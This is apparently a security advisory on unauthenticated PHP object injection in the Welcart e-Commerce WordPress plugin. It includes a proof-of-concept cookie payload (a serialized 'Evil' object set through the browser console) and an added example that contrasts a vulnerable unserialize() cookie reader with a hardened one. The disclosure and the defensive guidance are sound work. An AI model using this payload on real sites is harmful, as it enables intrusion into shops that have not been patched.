wpexploit | Krzysztof Zając (CERT PL) | WPEX-ID:0ACD613E-DBD6-42AE-9F3D-6D6E77A4C1B7
History: Nov 10, 2023 - 12:00 a.m.

Welcart e-Commerce < 2.9.5 - Unauthenticated PHP Object Injection

Tags: welcart e-commerce, gadget chain, plugin vulnerability, web developer console, unauthenticated exploit

AI Score: 7.6 High (Confidence: Low)
EPSS: 0.001 Low (Percentile: 43.4%)

Description

The plugin unserializes user input from cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.

To simulate a gadget chain, put the following code in a plugin:
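// Stand-in gadget: PHP calls __wakeup() automatically when unserialize()
// rebuilds an object of this class.
class Evil {
    public function __wakeup() : void {
        die("Arbitrary deserialization");
    }
}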

Then, while visiting the blog as an unauthenticated user, execute the command below in the browser's web developer console:

document.cookie='usces_cookie=O:4:"Evil":0:{}'

Refresh the page to see the 'Arbitrary deserialization' message displayed.
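
The root cause and one way to close it, as an added example that is not Welcart's code or its actual fix: a cookie reader that passes the usces_cookie value straight to unserialize(), beside a hardened reader that refuses to instantiate classes. The function names, the WakeupLog helper and the benign cookie contents are assumptions made for illustration; the Evil class here records the call instead of calling die() so both paths can run in one script.

```php
<?php
// Added example. Hypothetical cookie readers, not Welcart's actual code.

final class WakeupLog { public static array $fired = []; }

// Stand-in gadget from the page; records the call instead of die().
class Evil {
    public function __wakeup(): void {
        WakeupLog::$fired[] = __CLASS__;
    }
}

// Vulnerable pattern: cookie bytes go straight into unserialize(),
// so any loaded class with a magic method can be instantiated.
function read_cookie_unsafe(array $cookies) {
    return isset($cookies['usces_cookie'])
        ? unserialize($cookies['usces_cookie'])
        : null;
}

// Hardened pattern: no class instantiation, flat array of scalars only.
function read_cookie_hardened(array $cookies): array {
    $raw = $cookies['usces_cookie'] ?? '';
    if (!is_string($raw) || $raw === '') {
        return [];
    }
    // allowed_classes => false turns every object into
    // __PHP_Incomplete_Class, so __wakeup()/__destruct() never run.
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data)) {
        return [];
    }
    foreach ($data as $value) {
        if ($value !== null && !is_scalar($value)) {
            return [];   // nested object or array: reject the whole cookie
        }
    }
    return $data;
}

// Constructed inputs: the page's payload and a benign serialized array.
$attack = ['usces_cookie' => 'O:4:"Evil":0:{}'];
$benign = ['usces_cookie' => serialize(['item' => 'sku-1', 'qty' => 2])];

read_cookie_hardened($attack);
echo 'hardened, gadget calls: ', count(WakeupLog::$fired), PHP_EOL;
print_r(read_cookie_hardened($benign));
read_cookie_unsafe($attack);
echo 'unsafe, gadget calls: ', count(WakeupLog::$fired), PHP_EOL;
```

Storing the cookie as JSON and reading it with json_decode() removes unserialize() from the request path entirely, which is the stronger option when the cookie format can be changed.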
